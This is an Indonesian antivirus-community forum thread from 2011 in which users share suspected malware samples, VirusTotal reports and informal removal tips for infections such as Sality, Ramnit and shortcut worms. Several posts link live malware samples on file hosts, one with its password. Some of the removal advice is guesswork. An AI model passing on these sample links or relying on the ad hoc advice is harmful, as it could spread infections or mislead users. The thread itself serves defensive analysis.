 :) :) :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: HezekiahSoft pada Januari 15, 2011, 04:18:34 PM
om .. berhubung saya pake koneksi internet. apa harus di matiin dulu koneksinya baru saya mulai bedah ntu virus ? apa gmn bagusnya ??

 :) :) :)
matikan saja,supaya tidak masuk lagi
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: arisrisyandi pada Januari 15, 2011, 09:55:15 PM
om .. berhubung saya pake koneksi internet. apa harus di matiin dulu koneksinya baru saya mulai bedah ntu virus ? apa gmn bagusnya ??

 :) :) :)
matikan saja,supaya tidak masuk lagi


Okay om malay tar sya coba .. tq :-bd :-bd ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: nubitol pada Januari 26, 2011, 01:34:50 PM
mas mas sesepuh sekalian, di komputer saya ada folder bernamakan aux dan folder itu gk bisa dibuka atau pun dihapus, klo di didelete pasti ada warning invalid ms-dos function, apakah itu virus atau bukan y?
mohon bantuannya  ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PraskaOkey pada Januari 26, 2011, 03:24:14 PM
mas mas sesepuh sekalian, di komputer saya ada folder bernamakan aux dan folder itu gk bisa dibuka atau pun dihapus, klo di didelete pasti ada warning invalid ms-dos function, apakah itu virus atau bukan y?
mohon bantuannya  ^:)^

Coba cek ke http://smadaver.com/operating-system/ada-yg-tau-cara-hilangin-folder-'con-aux-nul'-gak/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: sarau pada Januari 26, 2011, 08:32:00 PM
KK INI VIRUS NGGAK BISAH DI KARANTINA............

MOHON PENCERAHANNYA..............
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: noegroho03 pada Januari 26, 2011, 10:11:55 PM
tolong donk untukmengatasi ini:
virus apakah ini dan anti virusnya apa....?
dia selalumemperbanyak filedi folder resycler flash disk
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: agus_suardana pada Januari 27, 2011, 07:26:25 AM
ini spreti junk virus
FD saya juga kena
smadav udh bisa kok mengatasi ny tpi cma di quarantine aj
saya pke VIPRE udh bisa dibasmi ini virus :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: nubitol pada Januari 27, 2011, 10:28:38 AM
mas mas sesepuh sekalian, di komputer saya ada folder bernamakan aux dan folder itu gk bisa dibuka atau pun dihapus, klo di didelete pasti ada warning invalid ms-dos function, apakah itu virus atau bukan y?
mohon bantuannya  ^:)^

Coba cek ke http://smadaver.com/operating-system/ada-yg-tau-cara-hilangin-folder-'con-aux-nul'-gak/

problem solved...
terima kasih sangat buat mas PraskaOkey
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: HezekiahSoft pada Januari 27, 2011, 04:39:01 PM
KK INI VIRUS NGGAK BISAH DI KARANTINA............

MOHON PENCERAHANNYA..............

itu new heur level 9
coba ikuti cara ini

1.delete File new heur level 9 dengan SMADAV
2.Download Sality Killer (http://www.kaspersky.com/downloads/utils/salitykiller.zip)
3.jangan Extract File Tersebut
4.Ubah Nama Sality Killer.exe menjadi Autorun.exe (Didalam Zip Tersebut)
5.Buka File
6.Tunggu Scan semua disk Hingga selesai
7.download antivirus impor
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: geshanc pada Januari 28, 2011, 05:56:03 PM
ga ni ada virus new huer gmn ya ga cara basminya, wah repot pakai smadac masih menonggol terus.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: agus_suardana pada Januari 30, 2011, 08:33:03 PM
@up
cba ikuti cara ny bung Malaikat :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: warpls pada Februari 01, 2011, 09:35:25 AM
rekan smadaver ini saya punya virus kedetek sality sama smnadav dan morphost tapi tidak kedetek sama av import
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: agus_suardana pada Februari 01, 2011, 12:54:26 PM
mungkin sality lokal sob
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 0991rock pada Februari 03, 2011, 11:52:53 AM
 :D
ada virus baru kk....namanya new heur...lum bisa di hapis....baru bisa di karantina,,tolong update bwat virus yg satu ini ia kk....makasi... ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 0991rock pada Februari 03, 2011, 11:54:03 AM
ia kk sama ni...gmn ia...saya jg dah minta update sama smadaver...smoga aja cpt di update bwat virus yg 1 ini...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: agus_suardana pada Februari 03, 2011, 03:49:10 PM
@up
sudah scan pke AV impor.?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: HezekiahSoft pada Februari 04, 2011, 05:21:04 PM
ada Virus bandel bgt nih
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 0991rock pada Februari 05, 2011, 02:20:45 AM
setau saya new heur m sality tu sama kk.... :-\
itu setau saya...dan setau saya saya bisa bersihin mke nod32....
alhamdullilah bisa kk... :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: agus_suardana pada Februari 05, 2011, 07:47:07 AM
sudah coba pke ESS
tpi ga seneng gara2 bnyk false ny
oya klo ga bsa
pke sality killer ny kasper aj dlu
dijamin mantab :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Okavhiruzzz pada Februari 05, 2011, 07:39:10 PM
itu cuma salah satunya gan, udah banyak bgt cabangnya.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ghopin pada Februari 11, 2011, 10:41:48 AM
Virus kemungkinan belum terdeteksi secara maksimal ditangani smadav dan masih berfungsi di PC ketika menggunakan Smadav
TR/Crypt.XPACK.Gen
TR/Dropper.Gen
Suspicious.MH690
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ghopin pada Februari 11, 2011, 11:10:04 AM
Dapat diatasi menggunakan delete Avira
TR/Crypt.XPACK.Gen
TR/Dropper.Gen
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ajojing pada Februari 11, 2011, 02:25:44 PM
WORM P2P, baru sedikit yg deteksi :)

http://www.virustotal.com/file-scan/report.html?id=434a88595f40af95768387c453443b7c4b5653f1d77cdf5554319fc1ee59d2d4-1297408223

http://virscan.org/report/9dc20d9f38a69e4a8820030cda6f58c7.html

*filenya gamau di attach,  ~x( yaudah saya upload tempat lain
http://www.4shared.com/file/5uUna5Ui/bszip.html
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: diablejump pada Februari 21, 2011, 03:31:53 PM
izin upload virus bos

sekalian mau tanya kok saya ga bisa upload virus langsung dari website smadavnya ya

pas mau upload keluar notif "ERROR : failed to find flength file"....kira2 kenapa tuh bos?mohon analisanya:D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Desperados pada Februari 22, 2011, 01:14:12 AM
nama malcode/malware nya
FakeVimes[zombie]
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: slash210 pada Februari 24, 2011, 08:11:38 PM
tolongin dunk, ini virus (RNMain.exe) menggangu sekali... jadi lemot internetannya... ga kedetect pake smadav 8.4 sam avast 5
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Desperados pada Februari 24, 2011, 10:39:18 PM
untuk file RNMain.exe saat di unduh di virustotal.com
ini hasilnya
Antiy-AVL                   Trojan/Win32.KillFiles.gen
AVG                             Generic2.ZAU
CAT-QuickHeal           Trojan.Agent.ATV
Comodo                   ApplicUnwnt.Win32.CnsMin
K7AntiVirus              Trojan
McAfee              Artemis!3653D6C1F542
McAfee-GW-Edition   Artemis!3653D6C1F542
NOD32               Win32/CnsMin
Norman              W32/Suspicious_Gen2.LET
Prevx   3.0               Email High Risk Cloaked Malware
Symantec               WS.Reputation.1

dan semua file ".dll" itu di deteksi sebagai rootkit sebagian besarnya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada Februari 26, 2011, 10:46:42 AM
tolongin dunk, ini virus (RNMain.exe) menggangu sekali... jadi lemot internetannya... ga kedetect pake smadav 8.4 sam avast 5

cek inih :D http://www.virustotal.com/file-scan/report.html?id=cd5dad3838dcf5494a873b5c7b22e5933519f0069574fb1ce12de82d3f0a3cab-1298691733

slhkan cba DR web:D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada Februari 27, 2011, 01:52:47 PM
file doc jd  exe avast tba tmpilanx putih semua stlah kna ini virus ....upload dvirus total g ada yg detec :(
smadav g detc.....
 :D sukur stlah restar avast kmbli normal:D ;)
dibwah ini slah satu sample virus data doc jd exe ....:D slhkan dtelity... :D...smga smadav bsa mmbasmi :D sdah 3 laptop trjangkit nih dan bnyak av luar g ada detec....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Februari 27, 2011, 02:13:54 PM
file doc jd  exe avast tba tmpilanx putih semua stlah kna ini virus ....upload dvirus total g ada yg detec :(
smadav g detc.....
 :D sukur stlah restar avast kmbli normal:D ;)
dibwah ini slah satu sample virus data doc jd exe ....:D slhkan dtelity... :D...smga smadav bsa mmbasmi :D sdah 3 laptop trjangkit nih dan bnyak av luar g ada detec....

utk file yg ada di attachment, coba di ganti ext. ---> dari .exe menjadi .doc

nih, ane convert menjadi PDF... :P
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Aditya Stmik pada Februari 27, 2011, 06:00:56 PM
ada virus baru yang gak bs di scan pake smadav rev 2011...
nama : autorun.INF
type : suspected INF
level : 9
gmn nih mas bro... :-\ komputerku msh terjangkit virus itu,... ~x(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: pratama123 pada Februari 28, 2011, 08:29:50 PM
tolongin dunk, ini virus (RNMain.exe) menggangu sekali... jadi lemot internetannya... ga kedetect pake smadav 8.4 sam avast 5

cek inih :D http://www.virustotal.com/file-scan/report.html?id=cd5dad3838dcf5494a873b5c7b22e5933519f0069574fb1ce12de82d3f0a3cab-1298691733

slhkan cba DR web:D :D
lihat dong itu avastnya masih versi yang brapa
5.0.677 kan versi yang sekarang 6.0.10000
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: HezekiahSoft pada Februari 28, 2011, 09:12:24 PM
ada virus baru yang gak bs di scan pake smadav rev 2011...
nama : autorun.INF
type : suspected INF
level : 9
gmn nih mas bro... :-\ komputerku msh terjangkit virus itu,... ~x(

coba pakai cara ini
http://smadaver.com/konsultasi-virus/tolong-kk-cranya-hlngin-virus-new-heur-level%289%29/10/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: avagayard pada Maret 01, 2011, 12:03:41 PM
Lheora.A Variant
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: doy apry pada Maret 03, 2011, 12:14:46 PM
kk bagai mna caranya upload virus nya....? ??? ??? ??? ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PraskaOkey pada Maret 03, 2011, 12:18:11 PM
kk bagai mna caranya upload virus nya....? ??? ??? ??? ???

Cara Upload File :
Klik Reply
Klik Additional Options...
Lalu Browse
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada Maret 03, 2011, 05:03:43 PM
tolongin dunk, ini virus (RNMain.exe) menggangu sekali... jadi lemot internetannya... ga kedetect pake smadav 8.4 sam avast 5

cek inih :D http://www.virustotal.com/file-scan/report.html?id=cd5dad3838dcf5494a873b5c7b22e5933519f0069574fb1ce12de82d3f0a3cab-1298691733

slhkan cba DR web:D :D
lihat dong itu avastnya masih versi yang brapa
5.0.677 kan versi yang sekarang 6.0.10000

@ pratama sdah kversi 6 belum juga detek:D sdah saya cb dan update terus:D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Maret 07, 2011, 09:25:59 AM
sample fake installer smadav:
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: themes7 pada Maret 28, 2011, 08:01:45 AM
alhamdulillah komputer ane, aman2 aja gan  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: mra17di pada Maret 29, 2011, 07:58:33 PM
Rekan2 yg baik
mohon nih petunjuknya.. bagaimana sih atasi virus worm yg didetek smadav "juepee.exe" dan "x.exe" .... sdh di fix tapi kayaknya masih nyangkut juga... pakai mcafee juga tidak detek itu virus, gejala kompi terasa berat banget cpu usage jalan hampir 100%, liat di task manager gak ada proses yg nyedot usage cpu besar... ~x( ~x(.  ..
tolongin donk please....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada April 02, 2011, 06:47:38 PM
hi hi dapat virus baru nih sklian dtelitii :D
smadav g detek n smdav ngehang :D
avast g bsa delete krn processx smadav ngehang :D
silhkan dteliti :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: qcx pada April 03, 2011, 08:49:52 PM
pertanyaan:apakah ini Benar2 virus ? krn hny suspected
didetek smadav:  virusname: new.heur.variant(ego.exe) type: suspected  status:detected process (could`t be killed)

sayangnya ga bs ngclean.
nod32 versi 4 (update terbaru)=tdk mendeteksi virus
pcmav 4.2 = tdk mendeteksi virus.

itu file patch buat main game.. jd penting jg nih. siapa tau hny krn patch jdnya suspected aja ?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Uko_Corleone pada April 04, 2011, 01:31:46 PM
pertanyaan:apakah ini Benar2 virus ? krn hny suspected
didetek smadav:  virusname: new.heur.variant(ego.exe) type: suspected  status:detected process (could`t be killed)

sayangnya ga bs ngclean.
nod32 versi 4 (update terbaru)=tdk mendeteksi virus
pcmav 4.2 = tdk mendeteksi virus.

itu file patch buat main game.. jd penting jg nih. siapa tau hny krn patch jdnya suspected aja ?
coba upload filenya ke http://www.virustotal.com
nanti pas udah selese pasti link yang ada di address bar ke sini..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada April 04, 2011, 04:27:41 PM
hi hi dapat virus baru nih sklian dtelitii :D
smadav g detek n smdav ngehang :D
avast g bsa delete krn processx smadav ngehang :D
silhkan dteliti :D


tolong donk di zipkan terlebih dahulu :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada April 04, 2011, 04:43:24 PM
hi hi dapat virus baru nih sklian dtelitii :D
smadav g detek n smdav ngehang :D
avast g bsa delete krn processx smadav ngehang :D
silhkan dteliti :D


tolong donk di zipkan terlebih dahulu :)

sdah bang :D
hehe lpa saya :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada April 04, 2011, 05:10:55 PM
upload ulang,saya mau donload soalnya :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: qcx pada April 06, 2011, 12:44:54 AM
http://www.virustotal.com/file-scan/report.html?id=825b9f744e3c75bf427c59af785a186c52d17295ab25cb8b1d5a3287a81bd5cc-1302024779
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada April 06, 2011, 05:15:15 PM
ada virus varian baru shortcut kawan2q [:D]
virus ini shrtcutx bericon cmd dan ada autorun exe ddlam recycle serta menghiden file2 dremovable skrg dlam upload kforum tu virus [:D]
hahhahahaha krn virus ini saya harus inul 2 korban laptop temen asik dapat duit [:D]
hahahhahahhahahahahhahaha smadav gdetek apa2 avast hanya detk autorun exe x aja v file smpah shortcutx tdk terdetk :D
silahkan dteliti yah :D

http://www.virustotal.com/file-scan/report.html?id=ed82e5bf87ea89a6efb5a01160658b467f118da3e618c94e32c4aa1752d9ac4b-1302085225#
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada April 06, 2011, 05:36:26 PM
ada virus varian baru shortcut kawan2q [:D]
virus ini shrtcutx bericon cmd dan ada autorun exe ddlam recycle serta menghiden file2 dremovable skrg dlam upload kforum tu virus [:D]
hahhahahaha krn virus ini saya harus inul 2 korban laptop temen asik dapat duit [:D]
hahahhahahhahahahahhahaha smadav gdetek apa2 avast hanya detk autorun exe x aja v file smpah shortcutx tdk terdetk :D
silahkan dteliti yah :D

http://www.virustotal.com/file-scan/report.html?id=ed82e5bf87ea89a6efb5a01160658b467f118da3e618c94e32c4aa1752d9ac4b-1302085225#
file sampah mah gampang diilangin..yg penting injectornya dl :D di eset udah kedetek koq :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada April 06, 2011, 05:39:39 PM
@tirta:
kena razia ESET Smart Security v.4  :-bd
(http://i51.tinypic.com/10riufm.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada April 06, 2011, 05:47:42 PM
ada virus varian baru shortcut kawan2q [:D]
virus ini shrtcutx bericon cmd dan ada autorun exe ddlam recycle serta menghiden file2 dremovable skrg dlam upload kforum tu virus [:D]
hahhahahaha krn virus ini saya harus inul 2 korban laptop temen asik dapat duit [:D]
hahahhahahhahahahahhahaha smadav gdetek apa2 avast hanya detk autorun exe x aja v file smpah shortcutx tdk terdetk :D
silahkan dteliti yah :D

http://www.virustotal.com/file-scan/report.html?id=ed82e5bf87ea89a6efb5a01160658b467f118da3e618c94e32c4aa1752d9ac4b-1302085225#
file sampah mah gampang diilangin..yg penting injectornya dl :D di eset udah kedetek koq :D


seep mastah :D
tq tq :D

@tirta:
kena razia ESET Smart Security v.4  :-bd
(http://i51.tinypic.com/10riufm.jpg)



hahahhahahah kna densus :D
mntap mntap 2:D
smga dmasukkan database smadav v bagusx smadav mnimbulkan kmbli file yg khidden :D ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Masdio pada April 06, 2011, 05:59:13 PM
ini crack idm, katanya avg KudaTroya.Dropper/Generik
abis itu gadget win7 saya ga mao keluar. tolong.... :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: aldy wizznu pada April 06, 2011, 06:10:26 PM
ini crack idm, katanya avg KudaTroya.Dropper/Generik
abis itu gadget win7 saya ga mao keluar. tolong.... :'(
  filenya yg diupload dizip ato rar aja, biar lbh aman
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Masdio pada April 06, 2011, 06:15:15 PM
ini crack idm, katanya avg KudaTroya.Dropper/Generik
abis itu gadget win7 saya ga mao keluar. tolong.... :'(
  filenya yg diupload dizip ato rar aja, biar lbh aman
udah kehapus paksa AVG :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Sikatro pada April 11, 2011, 07:18:07 PM
ni ada Fake antivirus McAfee ,
hampir aja gw ketipu. dasar yg bikin virus ini lebih-lebih katronya dr gw!!  >=) >=)  =))

http://www.sendspace.com/file/qb3hd0

passnya : "katro"

buruan download sebelum di hapus sama pihak sendsapacenya coy!!
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: sleketep pada April 20, 2011, 01:29:28 PM
ini virus ato apaan ya? udah di "bersihkan" setiap kali buka drive c/d/e nongol terus.. cari2 threadnya ga ada  :'( (apa emang yang nyari masih katro? ^-^. ..maklum baru sehari pake smadav)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: mujaf pada April 21, 2011, 12:21:16 PM
Nih om ada file yang mencurigakan, 'WaterMark.exe'
kata.x sih ntu file virus, dia tinggal di %Program Files%\microsoft\WaterMark.exe

http://www.ziddu.com/download/14682205/WaterMark.zip.html (http://www.ziddu.com/download/14682205/WaterMark.zip.html)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada April 21, 2011, 02:56:10 PM
Nih om ada file yang mencurigakan, 'WaterMark.exe'
kata.x sih ntu file virus, dia tinggal di %Program Files%\microsoft\WaterMark.exe

http://www.ziddu.com/download/14682205/WaterMark.zip.html (http://www.ziddu.com/download/14682205/WaterMark.zip.html)

itu ramnit. A udah ga' ada masalah klo di eset NOD32 :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: mujaf pada April 21, 2011, 05:18:38 PM
Nih om ada file yang mencurigakan, 'WaterMark.exe'
kata.x sih ntu file virus, dia tinggal di %Program Files%\microsoft\WaterMark.exe

http://www.ziddu.com/download/14682205/WaterMark.zip.html (http://www.ziddu.com/download/14682205/WaterMark.zip.html)

itu ramnit. A udah ga' ada masalah klo di eset NOD32 :)
oo,,,, gitu ya,,,,
saya juga g' tau kal ntu virus ramnit.a. soal.x tadi buru2x, jadi g' sempet men-scan
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada April 21, 2011, 09:20:17 PM
begitu extract lgs ke scan..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: BRUTALiTY pada April 21, 2011, 11:04:22 PM
ini virus ato apaan ya? udah di "bersihkan" setiap kali buka drive c/d/e nongol terus.. cari2 threadnya ga ada  :'( (apa emang yang nyari masih katro? ^-^. ..maklum baru sehari pake smadav)

Coba cek disini: http://smadaver.com/konsultasi-virus/virus-new-heur-level(9)-autorun-inf/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: quinchy pada April 22, 2011, 04:56:58 PM
halo pencinta smadav
bantu ana dong
neh di laptop ana ada virus

NEW HAUR LEVEL.9

dah di scan ama smadav ke detek
tapi diapus ga bisa
 kasi pencerahannya dong............................plissssssssssssssss :'( :'( :'( :'( :'( :'( :'( :'( ^:)^ ^:)^ ^:)^ ^:)^ ^:)^ ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: quinchy pada April 22, 2011, 04:59:12 PM
halo pencinta smadav
bantu ana dong
neh di laptop ana ada virus

NEW HAUR LEVEL.9

dah di scan ama smadav ke detek
tapi diapus ga bisa
 kasi pencerahannya dong............................plissssssssssssssss
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ari89 pada April 24, 2011, 08:37:32 PM
tolong gan ad virus worm yg ke detec sma smadav di com gua,tp gk bsa di hapus...
jenisnya virus worm,namanya confiker.B,dia nyerang jaringan internet gua jd disconect,mohon bantuannya agan2 sekalian,gmna cranya ngedelete tu virus..
di tggu jwbnya,atas perhatiannya gua ucapin terima kasih  :(  :(  :(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jusri Idris Effendi pada April 27, 2011, 07:52:07 AM
Mohon bantuannya y teman" Smadav...
Ada virus nie, yg g ke detect dengan Smadav 2011 Rev 8.4 scanning progress per 27-04-2011
Virusnya Virus shortcut .lnk
 :'( :'( :'( :'( :'( :'( :'( :'( :'( :'( :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: si saprol pada April 27, 2011, 04:55:13 PM
new heur yg satu ini bikin Smadav8.4 jd re-scan mpe lebih dri 10 jendela Smadav
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: wahyu.ilahi@bro pada April 28, 2011, 10:18:32 AM
Nanya Progress Smadav 2011 versi 8.5 ..?


Salam kenal sebelumnya mas Zai dan team SMADAV...!
Semoga sehat selalu dan makin sukses....,

Sebelumnya, ane sedikit memberikan comment berkenaan dengan antivirus SMADAV-nya.
Ane nilai, dari sekian banyak antivirus lokal khususnya yang memiliki feature dan kemampuan yang luar biasa dalam mendeteksi virus adanya di SMADAV....!!!! Dan ane lihat di perkantoran" tempat teman ane kerja pada makai antivirus ini....dan tanggapan dari mereka memberikan aplus...buat team SMADAV.

Selain itu tentunya, klo boleh sedikit, ane mau nyampaikan beberapa pertanyaan :
Gini mas Zai,

1. Sampai mana nich, progress pembuatan SMADAV 2011 versi 8.5 -nya, karena saat ini sudah banyak virus-virus baru bermunculan mas Zai, dan SMADAV 2011 8.4 sudah tidak bisa lagi mendeteksi virus-virus tsb...!
salah satu sample virusnya ini mas :
para+2013nabi  Nuh+autorun.rar (http://www.4shared.com/file/YOZWzc3D/para2013nabi__Nuhautorun.html)
(virus ini adalah virus shorcut size-nya 2 KB, selalu membuat file replika di semua jenis file baik itu doc, xls, jpg, mp3 dan yang lainnya, pokoknya rada ribet dech ngilangin virus ini...
Tolong analisa dan vaksinnya ya mas Zai...!!!

2. Klo boleh sedikit saran Mas Zai, Kan antivirus SMADAV terbitnya kadang-kadang bisa beberapa bulan sekali baru ada versi barunya....!!! Begini mas Zai, kan yang namanya virus selalu lebih dulu baru ada antivirusnya..bener kan mas Zai. Bisa gak mas Zai, dibuatkan update data base virusnya aja mas...! Jadi gak perlu ada versi baru SMADAV-nya, tapi data base nya aja yang di perbaharui....! Kan klo kita lihat beberapa antivirus luar, modelnya gitu mas Zai...! mereka mengeluarkan antivirus versi baru itu bisa sampai setahun sekali mas. Yang mereka update hanya Data base virusnya aja mas...! Antivirus lokal juga ada yang membuat data base terbaru hampir tiap hari, namanya BRIG*D*...! Lumayan bagus juga mas...! sebagai refrensi aja...!
http://www.brigade-antivirus.com/updatemanual.htm (http://www.brigade-antivirus.com/updatemanual.htm)

Demikian dulu mas Zai, semoga team SMADAV bisa selalu siap siaga dalam memberantas virus.:-bd
salam
PEDULI SMADAVER
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: si saprol pada April 28, 2011, 10:41:30 AM
Nanya Progress Smadav 2011 versi 8.5 ..?


Salam kenal sebelumnya mas Zai dan team SMADAV...!
Semoga sehat selalu dan makin sukses....,

Sebelumnya, ane sedikit memberikan comment berkenaan dengan antivirus SMADAV-nya.
Ane nilai, dari sekian banyak antivirus lokal khususnya yang memiliki feature dan kemampuan yang luar biasa dalam mendeteksi virus adanya di SMADAV....!!!! Dan ane lihat di perkantoran" tempat teman ane kerja pada makai antivirus ini....dan tanggapan dari mereka memberikan aplus...buat team SMADAV.

Selain itu tentunya, klo boleh sedikit, ane mau nyampaikan beberapa pertanyaan :
Gini mas Zai,

1. Sampai mana nich, progress pembuatan SMADAV 2011 versi 8.5 -nya, karena saat ini sudah banyak virus-virus baru bermunculan mas Zai, dan SMADAV 2011 8.4 sudah tidak bisa lagi mendeteksi virus-virus tsb...!
salah satu sample virusnya ini mas :
para+2013nabi  Nuh+autorun.rar (http://www.4shared.com/file/YOZWzc3D/para2013nabi__Nuhautorun.html)
(virus ini adalah virus shorcut size-nya 2 KB, selalu membuat file replika di semua jenis file baik itu doc, xls, jpg, mp3 dan yang lainnya, pokoknya rada ribet dech ngilangin virus ini...
Tolong analisa dan vaksinnya ya mas Zai...!!!

2. Klo boleh sedikit saran Mas Zai, Kan antivirus SMADAV terbitnya kadang-kadang bisa beberapa bulan sekali baru ada versi barunya....!!! Begini mas Zai, kan yang namanya virus selalu lebih dulu baru ada antivirusnya..bener kan mas Zai. Bisa gak mas Zai, dibuatkan update data base virusnya aja mas...! Jadi gak perlu ada versi baru SMADAV-nya, tapi data base nya aja yang di perbaharui....! Kan klo kita lihat beberapa antivirus luar, modelnya gitu mas Zai...! mereka mengeluarkan antivirus versi baru itu bisa sampai setahun sekali mas. Yang mereka update hanya Data base virusnya aja mas...! Antivirus lokal juga ada yang membuat data base terbaru hampir tiap hari, namanya BRIG*D*...! Lumayan bagus juga mas...! sebagai refrensi aja...!
http://www.brigade-antivirus.com/updatemanual.htm (http://www.brigade-antivirus.com/updatemanual.htm)

Demikian dulu mas Zai, semoga team SMADAV bisa selalu siap siaga dalam memberantas virus.:-bd
salam
PEDULI SMADAVER


Setujuh point '2'
update'an virus baru tanpa menunggu revisi baru kyak'a lebih efisien ! :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: khuga pada April 28, 2011, 03:35:52 PM
mohon pencerahan bwt menghilangkan virus cwsandbox. soalnya sudah search di internet kagak dapat juga cara meremove ini virus. walau sdh di delete pasti entar muncul lagi. pake smadav pun tak bisa hilang tuh virus ~x( ~x( ~x( ~x( ~x( ~x(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hesoyam pada April 28, 2011, 04:27:42 PM
mohon pencerahan bwt menghilangkan virus cwsandbox. soalnya sudah search di internet kagak dapat juga cara meremove ini virus. walau sdh di delete pasti entar muncul lagi. pake smadav pun tak bisa hilang tuh virus ~x( ~x( ~x( ~x( ~x( ~x(

coba kirim sample virusnya kesini ..
dalam format .rar yaa ..  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: win32_con pada April 28, 2011, 08:26:46 PM
mohon ditambahkan databasenya untuk type viruz ini,soalnya smadav 8.4 gak mendeteksi
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: win32_con pada April 28, 2011, 08:33:30 PM
ini lagi yg bikin kompiku koit
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: khuga pada April 29, 2011, 09:34:17 AM
ini sample virusnya. moga aja isa temukan cara untk mengatasinya ^:)^ ^:)^ ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada April 29, 2011, 10:16:12 AM
ini sample virusnya. moga aja isa temukan cara untk mengatasinya ^:)^ ^:)^ ^:)^

gua buka pke safe run kaspersky kok isinya cma notepad.exe punya mikocop yah ?

(http://i53.tinypic.com/2q3sxf8.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Sikatro pada April 29, 2011, 10:20:25 AM
@miftah : bukan virus tuhhh  ;D ;D  itu file lama, taun 2007
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada April 29, 2011, 10:25:13 AM
mohon ditambahkan databasenya untuk type viruz ini,soalnya smadav 8.4 gak mendeteksi
ini lagi yg bikin kompiku koit
ini sample virusnya. moga aja isa temukan cara untk mengatasinya ^:)^ ^:)^ ^:)^
dari ke 3 fie attach virus neh aneh banget gw ga bisa  DL sampe kelar  :o
ga tau nya pas ngeliat di dlm ESET dahmasuk Quarantine  :D
Judul: Re: Re: Upload VIRUS ke Forum..
